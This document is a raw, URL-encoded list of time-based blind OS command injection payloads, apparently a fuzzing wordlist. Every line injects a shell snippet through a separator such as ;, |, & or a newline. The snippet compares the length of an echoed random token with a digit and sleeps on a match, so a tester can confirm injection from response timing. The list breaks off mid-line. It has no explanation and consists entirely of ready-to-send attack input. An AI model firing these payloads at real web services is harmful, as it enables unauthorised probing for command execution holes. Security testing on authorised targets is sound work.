%7D%20%5D%20%26%26%20sleep%201%20%23\n%0A%20str%3D%24%28echo%20IKKWEG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20IKKWEG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20IKKWEG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20IKKWEG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20IKKWEG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20IKKWEG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20IKKWEG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20IKKWEG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%0A%20str%3D%24%28echo%20IKKWEG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%23\n%3B%20str%3D%24%28echo%20MJSZOL%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20MJSZOL%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20MJSZOL%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20MJSZOL%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20MJSZOL%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20MJSZOL%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20MJSZOL%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20MJSZOL%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%3B%20str%3D%24%28echo%20MJSZOL%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20//\n%7C%20%5B%201%20-ne%20%24%28echo%20CDUKUS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%202%20-ne%20%24%28echo%20CDUKUS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%203%20-ne%20%24%28echo%20CDUKUS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%204%20-ne%20%24%28echo%20CDUKUS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%205%20-ne%20%24%28echo%20CDUKUS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%206%20-ne%20%24%28echo%20CDUKUS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%207%20-ne%20%24%28echo%20CDUKUS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%208%20-ne%20%24%28echo%20CDUKUS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%7C%20%5B%209%20-ne%20%24%28echo%20CDUKUS%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHRUXO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHRUXO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHRUXO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHRUXO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHRUXO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHRUXO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHRUXO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHRUXO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20EHRUXO%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20//\n%0A%20str%3D%24%28echo%20RCSPMW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20RCSPMW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20RCSPMW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20RCSPMW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20RCSPMW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20RCSPMW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20RCSPMW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20RCSPMW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%0A%20str%3D%24%28echo%20RCSPMW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20//\n%3B%20str%3D%24%28echo%20OHOHHT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20OHOHHT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20OHOHHT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20OHOHHT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20OHOHHT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20OHOHHT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20OHOHHT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20OHOHHT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20OHOHHT%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%5C%5C\n%7C%20%5B%201%20-ne%20%24%28echo%20JJZSID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%202%20-ne%20%24%28echo%20JJZSID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%203%20-ne%20%24%28echo%20JJZSID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%204%20-ne%20%24%28echo%20JJZSID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%205%20-ne%20%24%28echo%20JJZSID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%206%20-ne%20%24%28echo%20JJZSID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%207%20-ne%20%24%28echo%20JJZSID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%208%20-ne%20%24%28echo%20JJZSID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%7C%20%5B%209%20-ne%20%24%28echo%20JJZSID%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TKDFPY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TKDFPY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TKDFPY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TKDFPY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TKDFPY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TKDFPY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TKDFPY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TKDFPY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TKDFPY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%5C%5C\n%0A%20str%3D%24%28echo%20ZDSKKE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20ZDSKKE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20ZDSKKE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20ZDSKKE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20ZDSKKE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20ZDSKKE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20ZDSKKE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20ZDSKKE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%0A%20str%3D%24%28echo%20ZDSKKE%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%5C%5C\n%3B%20str%3D%24%28echo%20ZVPMJQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20ZVPMJQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20ZVPMJQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20ZVPMJQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20ZVPMJQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20ZVPMJQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20ZVPMJQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20ZVPMJQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%3B%20str%3D%24%28echo%20ZVPMJQ%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26\n%7C%20%5B%201%20-ne%20%24%28echo%20HZZOKR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%202%20-ne%20%24%28echo%20HZZOKR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%203%20-ne%20%24%28echo%20HZZOKR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%204%20-ne%20%24%28echo%20HZZOKR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%205%20-ne%20%24%28echo%20HZZOKR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%206%20-ne%20%24%28echo%20HZZOKR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%207%20-ne%20%24%28echo%20HZZOKR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%208%20-ne%20%24%28echo%20HZZOKR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%7C%20%5B%209%20-ne%20%24%28echo%20HZZOKR%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HIXNBS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HIXNBS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HIXNBS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HIXNBS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HIXNBS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HIXNBS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HIXNBS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HIXNBS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HIXNBS%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%26\n%0A%20str%3D%24%28echo%20WBNIBQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20WBNIBQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20WBNIBQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20WBNIBQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20WBNIBQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20WBNIBQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20WBNIBQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20WBNIBQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%0A%20str%3D%24%28echo%20WBNIBQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%26\n%3B%20str%3D%24%28echo%20ZNGHTM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20ZNGHTM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20ZNGHTM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20ZNGHTM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20ZNGHTM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20ZNGHTM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20ZNGHTM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20ZNGHTM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%3B%20str%3D%24%28echo%20ZNGHTM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C\n%7C%20%5B%201%20-ne%20%24%28echo%20CSMWFN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%202%20-ne%20%24%28echo%20CSMWFN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%203%20-ne%20%24%28echo%20CSMWFN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%